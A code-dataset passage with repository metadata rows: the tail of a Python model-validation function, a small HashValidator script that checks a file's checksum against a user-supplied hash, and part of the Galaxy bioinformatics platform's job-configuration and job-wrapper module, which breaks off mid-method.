preds = model.c.predict(valid_x)
if average_n_predictions:
correct = 0
incorrect = 0
for y in np.unique(model.valid_y):
y_preds = preds[np.where(model.valid_y == y)]
for i in xrange(0, len(y_preds), average_n_predictions):
if sum(y_preds[i:(i + average_n_predictions)] == y) > (average_n_predictions / 2):
correct += 1
else:
incorrect += 1
acc = correct / (correct + incorrect)
else:
acc = sum(np.equal(preds, model.valid_y)) / len(preds)
_auc = auc(model.valid_y[:len(preds)], preds, pos_label=1)
if binarize:
binary_preds = np.greater_equal(preds, np.median(preds))
acc = sum(np.equal(binary_preds, model.valid_y)) / len(binary_preds)
print("validation auc: {auc}".format(auc=_auc))
log('epoch 0, validation accuracy {acc:.2%}'.format(acc=acc), True)
return acc, 0, model.serialize()
|
[
"yueranyuan@gmail.com"
] |
yueranyuan@gmail.com
|
e566c940bc12de675b66c189fc4527197db9b8bb
|
e8f67b90173daccb794bf3959f2b27742dc129ef
|
/HashValidator.py
|
5c276afe2f426f329339954a8ef7dfb4bb481854
|
[] |
no_license
|
kostas-pa/HashValidator
|
52fc2815e62d08fbefc75019fa3fc4db06d92480
|
784a19c421993060a6518cbf341dad5ce3ceee56
|
refs/heads/main
| 2023-08-05T19:53:37.124108
| 2021-09-27T10:25:43
| 2021-09-27T10:25:43
| 348,281,820
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
#!/usr/bin/env python
import sys
import os.path
from os import path
import hashlib
import tkinter as tk
from tkinter import filedialog
hashes = list(hashlib.algorithms_guaranteed)
bock_size = 65536 # The size of each read from the file
root = tk.Tk()
root.withdraw()
filename = filedialog.askopenfilename()
def menu():
num = 0
print("\n-----------Initial Menu-----------")
for i in hashes:
print(str(num) + ") " + i.upper())
num +=1
def main():
if path.exists(filename):
menu()
choice = int(input("Please type your choice (number): "))
inputhash = str(input("Please type the hash you want to check: "))
if choice < 0 or choice > len(hashes):
print("\nInvalid input!!!")
sys.exit()
checksum = hashlib.new(hashes[choice])
with open(filename, 'rb') as f:
hashUpdate = f.read(bock_size)
while len(hashUpdate) > 0:
checksum.update(hashUpdate)
hashUpdate = f.read(bock_size)
print(checksum.hexdigest())
print(inputhash)
if checksum.hexdigest().lower().strip() == inputhash.lower().strip():
print("\n[+] The hashes match. The file is intact!!!")
else:
print("\n[-] The hashes do not match. The file has been tampered!!!")
else:
print("[-] " + str(filename) + "path not found")
sys.exit()
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
kostas-pa.noreply@github.com
|
1af8914408d2e13a9171f9a975afddaad28bad1f
|
28e16491dbddefeef482f515bb84f8cbf619929a
|
/lib/galaxy/jobs/__init__.py
|
159c0dd340d7451e1f71fcde42245ca54e07a52c
|
[
"CC-BY-2.5",
"AFL-2.1",
"AFL-3.0",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hidelab/galaxy-central-hpc
|
a9e469829cdcfa4adf8fcbcc178534d5e2dccf0b
|
75539db90abe90377db95718f83cafa7cfa43301
|
refs/heads/master
| 2021-01-23T10:20:57.837042
| 2017-09-06T14:15:46
| 2017-09-06T14:15:46
| 102,609,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87,784
|
py
|
"""
Support for running a tool in Galaxy via an internal job management system
"""
from abc import ABCMeta
from abc import abstractmethod
import time
import copy
import datetime
import galaxy
import logging
import os
import pwd
import random
import re
import shutil
import subprocess
import sys
import traceback
from galaxy import model, util
from galaxy.datatypes import metadata
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.jobs.actions.post import ActionBox
from galaxy.jobs.mapper import JobRunnerMapper
from galaxy.jobs.runners import BaseJobRunner, JobState
from galaxy.util.bunch import Bunch
from galaxy.util.expressions import ExpressionContext
from galaxy.util.json import from_json_string
from galaxy.util import unicodify
from .output_checker import check_output
from .datasets import TaskPathRewriter
from .datasets import OutputsToWorkingDirectoryPathRewriter
from .datasets import NullDatasetPathRewriter
from .datasets import DatasetPath
log = logging.getLogger( __name__ )
DATABASE_MAX_STRING_SIZE = util.DATABASE_MAX_STRING_SIZE
DATABASE_MAX_STRING_SIZE_PRETTY = util.DATABASE_MAX_STRING_SIZE_PRETTY
# This file, if created in the job's working directory, will be used for
# setting advanced metadata properties on the job and its associated outputs.
# This interface is currently experimental, is only used by the upload tool,
# and should eventually become API'd
TOOL_PROVIDED_JOB_METADATA_FILE = 'galaxy.json'
class JobDestination( Bunch ):
"""
Provides details about where a job runs
"""
def __init__(self, **kwds):
self['id'] = None
self['url'] = None
self['tags'] = None
self['runner'] = None
self['legacy'] = False
self['converted'] = False
self['env'] = []
self['resubmit'] = []
# dict is appropriate (rather than a bunch) since keys may not be valid as attributes
self['params'] = dict()
# Use the values persisted in an existing job
if 'from_job' in kwds and kwds['from_job'].destination_id is not None:
self['id'] = kwds['from_job'].destination_id
self['params'] = kwds['from_job'].destination_params
super(JobDestination, self).__init__(**kwds)
# Store tags as a list
if self.tags is not None:
self['tags'] = [ x.strip() for x in self.tags.split(',') ]
class JobToolConfiguration( Bunch ):
"""
Provides details on what handler and destination a tool should use
A JobToolConfiguration will have the required attribute 'id' and optional
attributes 'handler', 'destination', and 'params'
"""
def __init__(self, **kwds):
self['handler'] = None
self['destination'] = None
self['params'] = dict()
super(JobToolConfiguration, self).__init__(**kwds)
def get_resource_group( self ):
return self.get( "resources", None )
class JobConfiguration( object ):
"""A parser and interface to advanced job management features.
These features are configured in the job configuration, by default, ``job_conf.xml``
"""
DEFAULT_NWORKERS = 4
def __init__(self, app):
"""Parse the job configuration XML.
"""
self.app = app
self.runner_plugins = []
self.handlers = {}
self.handler_runner_plugins = {}
self.default_handler_id = None
self.destinations = {}
self.destination_tags = {}
self.default_destination_id = None
self.tools = {}
self.resource_groups = {}
self.default_resource_group = None
self.resource_parameters = {}
self.limits = Bunch()
self.__parse_resource_parameters()
# Initialize the config
try:
tree = util.parse_xml(self.app.config.job_config_file)
self.__parse_job_conf_xml(tree)
except IOError:
log.warning( 'Job configuration "%s" does not exist, using legacy job configuration from Galaxy config file "%s" instead' % ( self.app.config.job_config_file, self.app.config.config_file ) )
self.__parse_job_conf_legacy()
def __parse_job_conf_xml(self, tree):
"""Loads the new-style job configuration from options in the job config file (by default, job_conf.xml).
:param tree: Object representing the root ``<job_conf>`` object in the job config file.
:type tree: ``xml.etree.ElementTree.Element``
"""
root = tree.getroot()
log.debug('Loading job configuration from %s' % self.app.config.job_config_file)
# Parse job plugins
plugins = root.find('plugins')
if plugins is not None:
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type', 'load')):
if plugin.get('type') == 'runner':
workers = plugin.get('workers', plugins.get('workers', JobConfiguration.DEFAULT_NWORKERS))
runner_kwds = self.__get_params(plugin)
runner_info = dict(id=plugin.get('id'),
load=plugin.get('load'),
workers=int(workers),
kwds=runner_kwds)
self.runner_plugins.append(runner_info)
else:
log.error('Unknown plugin type: %s' % plugin.get('type'))
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
# Parse handlers
handlers = root.find('handlers')
if handlers is not None:
for handler in self.__findall_with_required(handlers, 'handler'):
id = handler.get('id')
if id in self.handlers:
log.error("Handler '%s' overlaps handler with the same name, ignoring" % id)
else:
log.debug("Read definition for handler '%s'" % id)
self.handlers[id] = (id,)
for plugin in handler.findall('plugin'):
if id not in self.handler_runner_plugins:
self.handler_runner_plugins[id] = []
self.handler_runner_plugins[id].append( plugin.get('id') )
if handler.get('tags', None) is not None:
for tag in [ x.strip() for x in handler.get('tags').split(',') ]:
if tag in self.handlers:
self.handlers[tag].append(id)
else:
self.handlers[tag] = [id]
# Determine the default handler(s)
self.default_handler_id = self.__get_default(handlers, self.handlers.keys())
# Parse destinations
destinations = root.find('destinations')
job_metrics = self.app.job_metrics
for destination in self.__findall_with_required(destinations, 'destination', ('id', 'runner')):
id = destination.get('id')
destination_metrics = destination.get( "metrics", None )
if destination_metrics:
if not util.asbool( destination_metrics ):
# disable
job_metrics.set_destination_instrumenter( id, None )
else:
metrics_conf_path = self.app.config.resolve_path( destination_metrics )
job_metrics.set_destination_conf_file( id, metrics_conf_path )
else:
metrics_elements = self.__findall_with_required( destination, 'job_metrics', () )
if metrics_elements:
job_metrics.set_destination_conf_element( id, metrics_elements[ 0 ] )
job_destination = JobDestination(**dict(destination.items()))
job_destination['params'] = self.__get_params(destination)
job_destination['env'] = self.__get_envs(destination)
job_destination['resubmit'] = self.__get_resubmits(destination)
self.destinations[id] = (job_destination,)
if job_destination.tags is not None:
for tag in job_destination.tags:
if tag not in self.destinations:
self.destinations[tag] = []
self.destinations[tag].append(job_destination)
# Determine the default destination
self.default_destination_id = self.__get_default(destinations, self.destinations.keys())
# Parse resources...
resources = root.find('resources')
if resources is not None:
self.default_resource_group = resources.get( "default", None )
for group in self.__findall_with_required(resources, 'group'):
id = group.get('id')
fields_str = group.get('fields', None) or group.text or ''
fields = [ f for f in fields_str.split(",") if f ]
self.resource_groups[ id ] = fields
# Parse tool mappings
tools = root.find('tools')
if tools is not None:
for tool in self.__findall_with_required(tools, 'tool'):
# There can be multiple definitions with identical ids, but different params
id = tool.get('id').lower().rstrip('/')
if id not in self.tools:
self.tools[id] = list()
self.tools[id].append(JobToolConfiguration(**dict(tool.items())))
self.tools[id][-1]['params'] = self.__get_params(tool)
types = dict(registered_user_concurrent_jobs=int,
anonymous_user_concurrent_jobs=int,
walltime=str,
output_size=util.size_to_bytes)
self.limits = Bunch(registered_user_concurrent_jobs=None,
anonymous_user_concurrent_jobs=None,
walltime=None,
walltime_delta=None,
output_size=None,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
# Parse job limits
limits = root.find('limits')
if limits is not None:
for limit in self.__findall_with_required(limits, 'limit', ('type',)):
type = limit.get('type')
# concurrent_jobs renamed to destination_user_concurrent_jobs in job_conf.xml
if type in ( 'destination_user_concurrent_jobs', 'concurrent_jobs', 'destination_total_concurrent_jobs' ):
id = limit.get('tag', None) or limit.get('id')
if type == 'destination_total_concurrent_jobs':
self.limits.destination_total_concurrent_jobs[id] = int(limit.text)
else:
self.limits.destination_user_concurrent_jobs[id] = int(limit.text)
elif limit.text:
self.limits.__dict__[type] = types.get(type, str)(limit.text)
if self.limits.walltime is not None:
h, m, s = [ int( v ) for v in self.limits.walltime.split( ':' ) ]
self.limits.walltime_delta = datetime.timedelta( 0, s, 0, 0, m, h )
log.debug('Done loading job configuration')
def __parse_job_conf_legacy(self):
"""Loads the old-style job configuration from options in the galaxy config file (by default, universe_wsgi.ini).
"""
log.debug('Loading job configuration from %s' % self.app.config.config_file)
# Always load local and lwr
self.runner_plugins = [dict(id='local', load='local', workers=self.app.config.local_job_queue_workers), dict(id='lwr', load='lwr', workers=self.app.config.cluster_job_queue_workers)]
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
for runner in self.app.config.start_job_runners:
self.runner_plugins.append(dict(id=runner, load=runner, workers=self.app.config.cluster_job_queue_workers))
# Set the handlers
for id in self.app.config.job_handlers:
self.handlers[id] = (id,)
self.handlers['default_job_handlers'] = self.app.config.default_job_handlers
self.default_handler_id = 'default_job_handlers'
# Set tool handler configs
for id, tool_handlers in self.app.config.tool_handlers.items():
self.tools[id] = list()
for handler_config in tool_handlers:
# rename the 'name' key to 'handler'
handler_config['handler'] = handler_config.pop('name')
self.tools[id].append(JobToolConfiguration(**handler_config))
# Set tool runner configs
for id, tool_runners in self.app.config.tool_runners.items():
# Might have been created in the handler parsing above
if id not in self.tools:
self.tools[id] = list()
for runner_config in tool_runners:
url = runner_config['url']
if url not in self.destinations:
# Create a new "legacy" JobDestination - it will have its URL converted to a destination params once the appropriate plugin has loaded
self.destinations[url] = (JobDestination(id=url, runner=url.split(':', 1)[0], url=url, legacy=True, converted=False),)
for tool_conf in self.tools[id]:
if tool_conf.params == runner_config.get('params', {}):
tool_conf['destination'] = url
break
else:
# There was not an existing config (from the handlers section) with the same params
# rename the 'url' key to 'destination'
runner_config['destination'] = runner_config.pop('url')
self.tools[id].append(JobToolConfiguration(**runner_config))
self.destinations[self.app.config.default_cluster_job_runner] = (JobDestination(id=self.app.config.default_cluster_job_runner, runner=self.app.config.default_cluster_job_runner.split(':', 1)[0], url=self.app.config.default_cluster_job_runner, legacy=True, converted=False),)
self.default_destination_id = self.app.config.default_cluster_job_runner
# Set the job limits
self.limits = Bunch(registered_user_concurrent_jobs=self.app.config.registered_user_job_limit,
anonymous_user_concurrent_jobs=self.app.config.anonymous_user_job_limit,
walltime=self.app.config.job_walltime,
walltime_delta=self.app.config.job_walltime_delta,
output_size=self.app.config.output_size_limit,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
log.debug('Done loading job configuration')
def get_tool_resource_parameters( self, tool_id ):
""" Given a tool id, return XML elements describing parameters to
insert into job resources.
:tool id: A tool ID (a string)
:returns: List of parameter elements.
"""
fields = []
if not tool_id:
return fields
# TODO: Only works with exact matches, should handle different kinds of ids
# the way destination lookup does.
resource_group = None
if tool_id in self.tools:
resource_group = self.tools[ tool_id ][ 0 ].get_resource_group()
resource_group = resource_group or self.default_resource_group
if resource_group and resource_group in self.resource_groups:
fields_names = self.resource_groups[ resource_group ]
fields = [ self.resource_parameters[ n ] for n in fields_names ]
return fields
def __parse_resource_parameters( self ):
if not os.path.exists( self.app.config.job_resource_params_file ):
return
resource_definitions = util.parse_xml( self.app.config.job_resource_params_file )
resource_definitions_root = resource_definitions.getroot()
# TODO: Also handling conditionals would be awesome!
for parameter_elem in resource_definitions_root.findall( "param" ):
name = parameter_elem.get( "name" )
# Considered prepending __job_resource_param__ here and then
# stripping it off when making it available to dynamic job
# destination. Not needed because resource parameters are wrapped
# in a conditional.
## expanded_name = "__job_resource_param__%s" % name
## parameter_elem.set( "name", expanded_name )
self.resource_parameters[ name ] = parameter_elem
def __get_default(self, parent, names):
"""Returns the default attribute set in a parent tag like <handlers> or <destinations>, or return the ID of the child, if there is no explicit default and only one child.
:param parent: Object representing a tag that may or may not have a 'default' attribute.
:type parent: ``xml.etree.ElementTree.Element``
:param names: The list of destination or handler IDs or tags that were loaded.
:type names: list of str
:returns: str -- id or tag representing the default.
"""
rval = parent.get('default')
if rval is not None:
# If the parent element has a 'default' attribute, use the id or tag in that attribute
if rval not in names:
raise Exception("<%s> default attribute '%s' does not match a defined id or tag in a child element" % (parent.tag, rval))
log.debug("<%s> default set to child with id or tag '%s'" % (parent.tag, rval))
elif len(names) == 1:
log.info("Setting <%s> default to child with id '%s'" % (parent.tag, names[0]))
rval = names[0]
else:
raise Exception("No <%s> default specified, please specify a valid id or tag with the 'default' attribute" % parent.tag)
return rval
def __findall_with_required(self, parent, match, attribs=None):
"""Like ``xml.etree.ElementTree.Element.findall()``, except only returns children that have the specified attribs.
:param parent: Parent element in which to find.
:type parent: ``xml.etree.ElementTree.Element``
:param match: Name of child elements to find.
:type match: str
:param attribs: List of required attributes in children elements.
:type attribs: list of str
:returns: list of ``xml.etree.ElementTree.Element``
"""
rval = []
if attribs is None:
attribs = ('id',)
for elem in parent.findall(match):
for attrib in attribs:
if attrib not in elem.attrib:
log.warning("required '%s' attribute is missing from <%s> element" % (attrib, match))
break
else:
rval.append(elem)
return rval
def __get_params(self, parent):
"""Parses any child <param> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <param> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = {}
for param in parent.findall('param'):
rval[param.get('id')] = param.text
return rval
def __get_envs(self, parent):
"""Parses any child <env> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <env> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for param in parent.findall('env'):
rval.append( dict(
name=param.get('id'),
file=param.get('file'),
execute=param.get('exec'),
value=param.text,
raw=util.asbool(param.get('raw', 'false'))
) )
return rval
def __get_resubmits(self, parent):
"""Parses any child <resubmit> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <resubmit> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for resubmit in parent.findall('resubmit'):
rval.append( dict(
condition=resubmit.get('condition'),
destination=resubmit.get('destination'),
handler=resubmit.get('handler')
) )
return rval
@property
def default_job_tool_configuration(self):
"""The default JobToolConfiguration, used if a tool does not have an explicit defintion in the configuration. It consists of a reference to the default handler and default destination.
:returns: JobToolConfiguration -- a representation of a <tool> element that uses the default handler and destination
"""
return JobToolConfiguration(id='default', handler=self.default_handler_id, destination=self.default_destination_id)
# Called upon instantiation of a Tool object
def get_job_tool_configurations(self, ids):
"""Get all configured JobToolConfigurations for a tool ID, or, if given a list of IDs, the JobToolConfigurations for the first id in ``ids`` matching a tool definition.
.. note::
You should not mix tool shed tool IDs, versionless tool shed IDs, and tool config tool IDs that refer to the same tool.
:param ids: Tool ID or IDs to fetch the JobToolConfiguration of.
:type ids: list or str.
:returns: list -- JobToolConfiguration Bunches representing <tool> elements matching the specified ID(s).
Example tool ID strings include:
* Full tool shed id: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool/1.0.0``
* Tool shed id less version: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool``
* Tool config tool id: ``filter_tool``
"""
rval = []
# listify if ids is a single (string) id
ids = util.listify(ids)
for id in ids:
if id in self.tools:
# If a tool has definitions that include job params but not a
# definition for jobs without params, include the default
# config
for job_tool_configuration in self.tools[id]:
if not job_tool_configuration.params:
break
else:
rval.append(self.default_job_tool_configuration)
rval.extend(self.tools[id])
break
else:
rval.append(self.default_job_tool_configuration)
return rval
def __get_single_item(self, collection):
"""Given a collection of handlers or destinations, return one item from the collection at random.
"""
# Done like this to avoid random under the assumption it's faster to avoid it
if len(collection) == 1:
return collection[0]
else:
return random.choice(collection)
# This is called by Tool.get_job_handler()
def get_handler(self, id_or_tag):
"""Given a handler ID or tag, return the provided ID or an ID matching the provided tag
:param id_or_tag: A handler ID or tag.
:type id_or_tag: str
:returns: str -- A valid job handler ID.
"""
if id_or_tag is None:
id_or_tag = self.default_handler_id
return self.__get_single_item(self.handlers[id_or_tag])
def get_destination(self, id_or_tag):
"""Given a destination ID or tag, return the JobDestination matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: JobDestination -- A valid destination
Destinations are deepcopied as they are expected to be passed in to job
runners, which will modify them for persisting params set at runtime.
"""
if id_or_tag is None:
id_or_tag = self.default_destination_id
return copy.deepcopy(self.__get_single_item(self.destinations[id_or_tag]))
def get_destinations(self, id_or_tag):
"""Given a destination ID or tag, return all JobDestinations matching the provided ID or tag
:param id_or_tag: A destination ID or tag.
:type id_or_tag: str
:returns: list or tuple of JobDestinations
Destinations are not deepcopied, so they should not be passed to
anything which might modify them.
"""
return self.destinations.get(id_or_tag, None)
def get_job_runner_plugins(self, handler_id):
"""Load all configured job runner plugins
:returns: list of job runner plugins
"""
rval = {}
if handler_id in self.handler_runner_plugins:
plugins_to_load = [ rp for rp in self.runner_plugins if rp['id'] in self.handler_runner_plugins[handler_id] ]
log.info( "Handler '%s' will load specified runner plugins: %s", handler_id, ', '.join( [ rp['id'] for rp in plugins_to_load ] ) )
else:
plugins_to_load = self.runner_plugins
log.info( "Handler '%s' will load all configured runner plugins", handler_id )
for runner in plugins_to_load:
class_names = []
module = None
id = runner['id']
load = runner['load']
if ':' in load:
# Name to load was specified as '<module>:<class>'
module_name, class_name = load.rsplit(':', 1)
class_names = [ class_name ]
module = __import__( module_name )
else:
# Name to load was specified as '<module>'
if '.' not in load:
# For legacy reasons, try from galaxy.jobs.runners first if there's no '.' in the name
module_name = 'galaxy.jobs.runners.' + load
try:
module = __import__( module_name )
except ImportError:
# No such module, we'll retry without prepending galaxy.jobs.runners.
# All other exceptions (e.g. something wrong with the module code) will raise
pass
if module is None:
# If the name included a '.' or loading from the static runners path failed, try the original name
module = __import__( load )
module_name = load
if module is None:
# Module couldn't be loaded, error should have already been displayed
continue
for comp in module_name.split( "." )[1:]:
module = getattr( module, comp )
if not class_names:
# If there's not a ':', we check <module>.__all__ for class names
try:
assert module.__all__
class_names = module.__all__
except AssertionError:
log.error( 'Runner "%s" does not contain a list of exported classes in __all__' % load )
continue
for class_name in class_names:
runner_class = getattr( module, class_name )
try:
assert issubclass(runner_class, BaseJobRunner)
except TypeError:
log.warning("A non-class name was found in __all__, ignoring: %s" % id)
continue
except AssertionError:
log.warning("Job runner classes must be subclassed from BaseJobRunner, %s has bases: %s" % (id, runner_class.__bases__))
continue
try:
rval[id] = runner_class( self.app, runner[ 'workers' ], **runner.get( 'kwds', {} ) )
except TypeError:
log.exception( "Job runner '%s:%s' has not been converted to a new-style runner or encountered TypeError on load" % ( module_name, class_name ) )
rval[id] = runner_class( self.app )
log.debug( "Loaded job runner '%s:%s' as '%s'" % ( module_name, class_name, id ) )
return rval
def is_id(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == tuple
def is_tag(self, collection):
"""Given a collection of handlers or destinations, indicate whether the collection represents a tag or a real ID
:param collection: A representation of a destination or handler
:type collection: tuple or list
:returns: bool
"""
return type(collection) == list
def is_handler(self, server_name):
"""Given a server name, indicate whether the server is a job handler
:param server_name: The name to check
:type server_name: str
:return: bool
"""
for collection in self.handlers.values():
if server_name in collection:
return True
return False
def convert_legacy_destinations(self, job_runners):
"""Converts legacy (from a URL) destinations to contain the appropriate runner params defined in the URL.
:param job_runners: All loaded job runner plugins.
:type job_runners: list of job runner plugins
"""
for id, destination in [ ( id, destinations[0] ) for id, destinations in self.destinations.items() if self.is_id(destinations) ]:
# Only need to deal with real destinations, not members of tags
if destination.legacy and not destination.converted:
if destination.runner in job_runners:
destination.params = job_runners[destination.runner].url_to_destination(destination.url).params
destination.converted = True
if destination.params:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
for k, v in destination.params.items():
log.debug(" %s: %s" % (k, v))
else:
log.debug("Legacy destination with id '%s', url '%s' converted, got params:" % (id, destination.url))
else:
log.warning("Legacy destination with id '%s' could not be converted: Unknown runner plugin: %s" % (id, destination.runner))
class JobWrapper( object ):
"""
Wraps a 'model.Job' with convenience methods for running processes and
state management.
"""
def __init__( self, job, queue, use_persisted_destination=False ):
self.job_id = job.id
self.session_id = job.session_id
self.user_id = job.user_id
self.tool = queue.app.toolbox.tools_by_id.get( job.tool_id, None )
self.queue = queue
self.app = queue.app
self.sa_session = self.app.model.context
self.extra_filenames = []
self.command_line = None
# Tool versioning variables
self.write_version_cmd = None
self.version_string = ""
self.galaxy_lib_dir = None
# With job outputs in the working directory, we need the working
# directory to be set before prepare is run, or else premature deletion
# and job recovery fail.
# Create the working dir if necessary
try:
self.app.object_store.create(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
self.working_directory = self.app.object_store.get_filename(job, base_dir='job_work', dir_only=True, extra_dir=str(self.job_id))
log.debug('(%s) Working directory for job is: %s' % (self.job_id, self.working_directory))
except ObjectInvalid:
raise Exception('Unable to create job working directory, job failure')
self.dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.output_paths = None
self.output_hdas_and_paths = None
self.tool_provided_job_metadata = None
# Wrapper holding the info required to restore and clean up from files used for setting metadata externally
self.external_output_metadata = metadata.JobExternalOutputMetadataWrapper( job )
self.job_runner_mapper = JobRunnerMapper( self, queue.dispatcher.url_to_destination, self.app.job_config )
self.params = None
if job.params:
self.params = from_json_string( job.params )
if use_persisted_destination:
self.job_runner_mapper.cached_job_destination = JobDestination( from_job=job )
self.__user_system_pwent = None
self.__galaxy_system_pwent = None
def _job_dataset_path_rewriter( self, working_directory ):
if self.app.config.outputs_to_working_directory:
dataset_path_rewriter = OutputsToWorkingDirectoryPathRewriter( working_directory )
else:
dataset_path_rewriter = NullDatasetPathRewriter( )
return dataset_path_rewriter
def can_split( self ):
# Should the job handler split this job up?
return self.app.config.use_tasked_jobs and self.tool.parallelism
def get_job_runner_url( self ):
log.warning('(%s) Job runner URLs are deprecated, use destinations instead.' % self.job_id)
return self.job_destination.url
def get_parallelism(self):
return self.tool.parallelism
# legacy naming
get_job_runner = get_job_runner_url
@property
def job_destination(self):
"""Return the JobDestination that this job will use to run. This will
either be a configured destination, a randomly selected destination if
the configured destination was a tag, or a dynamically generated
destination from the dynamic runner.
Calling this method for the first time causes the dynamic runner to do
its calculation, if any.
:returns: ``JobDestination``
"""
return self.job_runner_mapper.get_job_destination(self.params)
def get_job( self ):
return self.sa_session.query( model.Job ).get( self.job_id )
def get_id_tag(self):
# For compatability with drmaa, which uses job_id right now, and TaskWrapper
return self.get_job().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.get_job()
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def get_version_string_path( self ):
return os.path.abspath(os.path.join(self.app.config.new_file_path, "GALAXY_VERSION_STRING_%s" % self.job_id))
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
self.sa_session.expunge_all() # this prevents the metadata reverting that has been seen in conjunction with the PBS job runner
if not os.path.exists( self.working_directory ):
os.mkdir( self.working_directory )
job = self._load_job()
def get_special( ):
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
if not special:
special = self.sa_session.query( model.GenomeIndexToolData ).filter_by( job=job ).first()
return special
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment, get_special=get_special )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
job.command_line = self.command_line
self.sa_session.add( job )
self.sa_session.flush()
# Return list of all extra files
self.param_dict = tool_evaluator.param_dict
version_string_cmd = self.tool.version_string_cmd
if version_string_cmd:
self.write_version_cmd = "%s > %s 2>&1" % ( version_string_cmd, compute_environment.version_path() )
else:
self.write_version_cmd = None
return self.extra_filenames
def default_compute_environment( self, job=None ):
if not job:
job = self.get_job()
return SharedComputeEnvironment( self, job )
def _load_job( self ):
# Load job from database and verify it has user or session.
# Restore parameters from the database
job = self.get_job()
if job.user is None and job.galaxy_session is None:
raise Exception( 'Job %s has no user and no session.' % job.id )
return job
def _get_tool_evaluator( self, job ):
# Hacky way to avoid cirular import for now.
# Placing ToolEvaluator in either jobs or tools
# result in ciruclar dependency.
from galaxy.tools.evaluation import ToolEvaluator
tool_evaluator = ToolEvaluator(
app=self.app,
job=job,
tool=self.tool,
local_working_directory=self.working_directory,
)
return tool_evaluator
def fail( self, message, exception=False, stdout="", stderr="", exit_code=None ):
"""
Indicate job failure by setting state and message on all output
datasets.
"""
job = self.get_job()
self.sa_session.refresh( job )
# if the job was deleted, don't fail it
if not job.state == job.states.DELETED:
# Check if the failure is due to an exception
if exception:
# Save the traceback immediately in case we generate another
# below
job.traceback = traceback.format_exc()
# Get the exception and let the tool attempt to generate
# a better message
etype, evalue, tb = sys.exc_info()
m = self.tool.handle_job_failure_exception( evalue )
if m:
message = m
if self.app.config.outputs_to_working_directory:
for dataset_path in self.get_output_fnames():
try:
shutil.move( dataset_path.false_path, dataset_path.real_path )
log.debug( "fail(): Moved %s to %s" % ( dataset_path.false_path, dataset_path.real_path ) )
except ( IOError, OSError ), e:
log.error( "fail(): Missing output file in working directory: %s" % e )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset = dataset_assoc.dataset
self.sa_session.refresh( dataset )
dataset.state = dataset.states.ERROR
dataset.blurb = 'tool error'
dataset.info = message
dataset.set_size()
dataset.dataset.set_total_size()
dataset.mark_unhidden()
if dataset.ext == 'auto':
dataset.extension = 'data'
# Update (non-library) job output datasets through the object store
if dataset not in job.output_library_datasets:
self.app.object_store.update_from_file(dataset.dataset, create=True)
# Pause any dependent jobs (and those jobs' outputs)
for dep_job_assoc in dataset.dependent_jobs:
self.pause( dep_job_assoc.job, "Execution of this dataset's job is paused because its input datasets are in an error state." )
self.sa_session.add( dataset )
self.sa_session.flush()
job.state = job.states.ERROR
job.command_line = self.command_line
job.info = message
# TODO: Put setting the stdout, stderr, and exit code in one place
# (not duplicated with the finish method).
if ( len( stdout ) > DATABASE_MAX_STRING_SIZE ):
stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stdout for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stdout = stdout
if ( len( stderr ) > DATABASE_MAX_STRING_SIZE ):
stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
log.info( "stderr for job %d is greater than %s, only a portion will be logged to database" % ( job.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
job.stderr = stderr
# Let the exit code be Null if one is not provided:
if ( exit_code != None ):
job.exit_code = exit_code
self.sa_session.add( job )
self.sa_session.flush()
#Perform email action even on failure.
for pja in [pjaa.post_job_action for pjaa in job.post_job_actions if pjaa.post_job_action.action_type == "EmailAction"]:
